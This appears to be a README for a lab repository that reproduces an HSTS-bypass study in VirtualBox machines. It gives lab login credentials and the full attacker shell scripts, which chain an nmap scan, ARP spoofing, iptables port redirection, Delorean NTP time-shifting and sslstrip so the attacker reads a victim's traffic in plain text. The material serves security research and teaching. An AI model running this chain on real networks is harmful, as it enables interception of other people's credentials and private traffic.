# Bypassing HSTS

## Index

- Pre requirements

- Project structure

- How to start

- Login credentials

- Attacker script

## Pre requirements

- Install Virtual box
- internet connection

## Project structure

in this repository we have 3 catels referring to OSs and 2 referring to browsers.
In "VM_Attacker" we have a kali linux virtual machine containing the tool and the scripts used in the attack.
In "VM_New" we have the latest version of the analyzed operating systems, i.e. mac os x lion 10.7.5, Ubuntu 21.4 and Windows 11 with all browser sources inside them.
In "VM_Old" we have the version of the analyzed operating systems in the reference paper, i.e. mac os x lion Developer Preview, Ubuntu 20.4, Fedora and Windows 8 with all browser sources inside them.
In "BrowserNew" we have the sources of the current browsers and in "BrowserOld" we have the sources of the reference brower of the analyzed paper.

## Login credentials

Kali linux
- User: root
- Password: toor

other virtual machines
- User: aldo
- Password: vittima

Windows 11:
- User: aldoVittima@outlook.it
- Password: V!ttim4

## How to start

import the attacker's virtual machine and a victim virtual machine, successimante the attacker launches the script, the victim (Unaware of the whole thing) surfs the Internet showing the conversation in plain text.

## Attacker script

### autoattack.sh
This code sequentially launches the communication hijacking commands, spoof attack, the Delorean tool in standart mode (moving NTP 5 Years into the future), and infile the sslstrip proxy and show the packet handoff in the clear.
Code:

```bash

#!/bin/bash
gnome-terminal –title=Dirottamento -- ./dirottamento.sh
read -p “Press enter to continue”
gnome-terminal –title=Spoof -- ./spoof.sh
read -p “Press enter to continue”
gnome-terminal –title=DeloreanLaunch -- ./deloreanLauch.sh
read -p “Press enter to continue”
gnome-terminal –title=SSLStrip – sslstrip -k -l 8080
read -p “Press enter to continue”
gnome-terminal –title=SSLStripLog – tail -f sslstrip.log
```

### dirottamento.sh

In this step we do a scan with the NMAP tool and choose the ip of our victim.

```bash

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080
iptables -t nat -A PREROUTING -p tcp –destination-port 443 -j REDIRECT –to-port 8080
iptables -t nat -A PREROUTING -p udp –destination-port 123 -j REDIRECT –to-port 123
iptables -t nat -L
hostname -I
ind=$(hostname -I | cut -d “ “ -f 1)
indirizzo=$ind’/24’
nmap -sn $indirizzo
```

### spoof.sh

We enter the previously chosen ip and its gateway.

```bash

#!/bin/bash
Echo ip victim:
read victim
echo ip gateway predefinito:
read gateway
arpspoof -i eth0 -t $victim $gateway
```

### deloreanLauch.sh

```bash

#!/bin/bash
cd Delorean
./delorean.py
```
